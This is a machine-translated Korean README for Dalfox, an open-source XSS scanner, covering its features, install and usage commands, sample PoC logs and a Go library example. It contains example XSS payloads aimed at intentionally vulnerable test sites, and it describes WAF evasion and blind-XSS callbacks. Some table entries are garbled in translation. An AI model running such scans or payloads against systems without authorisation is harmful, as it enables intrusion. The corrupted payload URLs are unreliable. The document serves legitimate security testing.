dalfox
v2.9.3
Dalfox는 자동화에 중점을 둔 강력한 오픈 소스 도구로 XSS 결함을 신속하게 스캔하고 매개 변수를 분석하는 데 이상적입니다. 고급 테스트 엔진 및 틈새 기능은 취약성을 감지하고 검증하는 프로세스를 간소화하도록 설계되었습니다.
이름은 Dal (달)이 "Moon"에 대한 한국 단어, "Fox"는 "XSS의 Finder"또는?
모드 : url sxss pipe file server payload
| 수업 | 주요 기능 | 설명 |
|---|---|---|
| 발견 | 매개 변수 분석 | - 반사 된 Param을 찾으십시오 - Alive/Bad Special Chars, 이벤트 처리기 및 공격 코드 찾기 - 주입 지점 식별 (HTML/JS/속성) inHTML-none inJS-none inJS-double inJS-single inJS-backtick inATTR-none inATTR-double inATTR-single |
| 정적 분석 | - CSP, XFO 등과 같은 나쁜 머리를 확인하십시오. | |
| BAV 분석 | - BAV 테스트 (기본 다른 취약점), 예를 들어 sqli ssti open-redirects , crlf , esii | |
| 매개 변수 마이닝 | - 사전 공격으로 새로운 매개 변수 찾기 (기본값은 gf-patterns) -사용자 정의 사전 파일을 지원합니다 ( --mining-dict-word )- Dom과 함께 새로운 Param을 찾으십시오 -원격 워드리스트를 사용하여 채굴 ( --remote-wordlists ) | |
| 내장 된 그레핑 | - SSTI의 기본 정보 누출, 자격 증명, SQL 오류 등을 식별합니다. | |
| WAF 검출 및 회피 | - WAF (웹 응용 프로그램 방화벽)를 감지합니다. - WAF를 발견하고 특수 플래그를 사용하는 경우 느린 요청을 사용하여 회피 --waf-evasion | |
| 스캐닝 | XSS 스캔 | - 반사 된 XSS / 저장 XSS / DOM XSS - Dom Base 확인 - 헤드리스베이스 확인 -Param, Header ( -b , --blind 옵션)를 사용한 블라인드 XSS 테스트-선택한 매개 변수 ( -p , --param ) 만 테스트합니다.-파라미터 분석 만 --only-discovery |
| 친절한 파이프 라인 | - 단일 URL 모드 ( dalfox url )- 파일 모드에서 ( dalfox file urls.txt )- IO (파이프 라인) 모드 ( dalfox pipe )-RAW HTTP 요청 파일 모드 ( dalfox file raw.txt --rawdata )에서 | |
| 페이로드의 최적화 쿼리 | - 추상화를 통해 주입 지점을 확인하고 적합 페이로드를 생성했습니다. - Badchar에 따라 불필요한 페이로드를 제거하십시오 | |
| 인코더 | - 모든 테스트 페이로드 (내장, 사용자 정의/블라인드)는 인코더와 병렬로 테스트됩니다. - URL 인코더를 두 배로 늘립니다 -Html 16 진수 인코더에 | |
| 순서 | -저장된 XSS ( --trigger )의 특수 페이지 자동 확인-저장 XSS에 대한 지원 ( --sequence ) 옵션, sxss 모드 만 | |
| http | HTTP 옵션 | -http 메소드를 덮어 쓰기 ( -X , --method )-리디렉션을 따르십시오 ( --follow-redirects )-헤더 추가 ( -H , --header )-쿠키 추가 ( -C , --cookie )-사용자 에이전트 추가 ( --user-agent )-시간 초과 설정 ( --timeout 아웃)-지연 설정 ( --delay )-프록시 설정 ( --proxy )-반환 코드 무시 설정 ( --ignore-return )-RAW 요청에서 쿠키로드 ( --cookie-from-raw ) |
| 동시성 | 노동자 | -노동자 번호 설정 ( -w , --worker ) |
| n * 호스트 | -멀티 캐스트 모드 ( --multicast ), file / pipe 모드 만 사용 | |
| 산출 | 산출 | - POC 코드와 유용한 정보 만 STDOUT로 작성됩니다. -저장 출력 ( -o , --output ) |
| 체재 | -json / plain ( --format ) | |
| 인쇄 | -침묵 모드 ( --silence )-색상을 인쇄하지 않기로 선택할 수 있습니다 ( --no-color )-스피너를 인쇄하지 않도록 선택할 수 있습니다 ( --no-spinner )-특별 POC 코드 표시 만 선택할 수 있습니다 ( --only-poc ) | |
| 보고서 | -세부 사항 표시 보고서 ( --report 및 --report-format=<plain/json> ) | |
| 확장 성 | 휴식 API | -API 서버 및 Swagger ( dalfox server ) |
| 페이로드 모드 | - XSS 테스트 용 페이로드 생성 및 열거 ( dalfox payload ) | |
| 발견 된 행동 | - 감지 할 때 취할 조치를 지정할 수 있습니다. -예를 들어 알림 ( --found-action ) | |
| 커스텀 그레핑 | - 응답에 대한 사용자 정규 표현식으로 Grep을 할 수 있습니다 -중복 감지하면 중복 제거 ( --grep )가 수행됩니다. | |
| 맞춤형 페이로드 | -사용자 정의 페이로드 목록 파일 ( --custom-payload ) 사용-사용자 정의 경고 값 ( --custom-alert-value )-사용자 정의 경고 유형 ( --custom-alert-type ) | |
| 원격 페이로드 | -Portswigger, Payloadbox 등의 원격 페이로드 사용 .. ( --remote-payloads ) | |
| 패키지 | 패키지 관리자 | -pkg.go.dev - 탭이있는 홈브리 - Snapcraft |
| 도커 env | - Docker Hub -Github 패키지의 Docker | |
| 다른 | -github 동작 |
그리고 테스트에 필요한 다양한 옵션 : d
brew install dalfox
# https://formulae.brew.sh/formula/dalfox sudo snap install dalfox
go install github.com/hahwul/dalfox/v2@latest
# The actual release might slightly differ. This is because go install references the main branch.더 많은 정보? 설치 안내서를 읽으십시오
dalfox [mode] [target] [flags]
단일 대상 모드
dalfox url http://testphp.vulnweb.com/listproducts.php ? cat = 123 & artist = 123 & asdf = ff
-b https://your-callback-url파일에서 다중 대상 모드
dalfox file urls_file --custom-payload ./mypayloads.txt파이프 라인 모드
cat urls_file | dalfox pipe -H " AuthToken: bbadsfkasdfadsf87 "다른 팁, 자세한 지침은 Wiki를 참조하십시오!
샘플 POC 로그
[POC][G][BUILT-IN/dalfox-error-mysql/GET] http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123DalFox
[POC][V][GET] http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%22%3E%3Csvg%2Fclass%3D%22dalfox%22onLoad%3Dalert%2845%29%3E
체재
| 신원 | 유형 | 정보 | 공백 | POC 코드 |
|---|---|---|---|---|
| POC | G | 내장/dalfox-ercror-mysql/get | http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123dalfox | |
| POC | 아르 자형 | 얻다 | http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%2222 년 3E%3CSVG%2FClass%3D%2222222222222222222222222222222222222222222222222%농도 4. | |
| POC | 다섯 | 얻다 | http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%2222 년 3E%3CSVG%2FClass%3D%2222222222222222222222222222222222222222222222222%농도 4. |
G (grep), R (반사), V (확인)왜 차이가 있습니까? 컷 등을 통해 POC 코드 만 쉽게 구문 분석 할 수있는 방법입니다. 예를 들어,이를 수행 할 수 있습니다.
dalfox url http://testphp.vulnweb.com/listproducts.php ? cat = 123 & artist = 123 & asdf = ff
| cut -d " " -f 2 > output
cat output
# http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123DalFox
# http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%22%3E%3Csvg%2FOnLoad%3D%22%60%24%7Bprompt%60%60%7D%60%22+class%3Ddalfox%3E package main
import (
"fmt"
dalfox "github.com/hahwul/dalfox/v2/lib"
)
func main () {
opt := dalfox. Options {
Cookie : "ABCD=1234" ,
}
result , err := dalfox . NewScan (dalfox. Target {
URL : "https://xss-game.appspot.com/level1/frame" ,
Method : "GET" ,
Options : opt ,
})
if err != nil {
fmt . Println ( err )
} else {
fmt . Println ( result )
}
}go build -o xssapp ; ./xssapp
# [] [{V GET https://xss-game.appspot.com/level1/frame?query=%3Ciframe+srcdoc%3D%22%3Cinput+onauxclick%3Dprint%281%29%3E%22+class%3Ddalfox%3E%3C%2Fiframe%3E}] 2.618998247s 2021-07-11 10:59:26.508483153 +0900 KST m=+0.000794230 2021-07-11 10:59:29.127481217 +0900 KST m=+2.619792477} |
확장하다
관련 애플리케이션
추천
|
|---|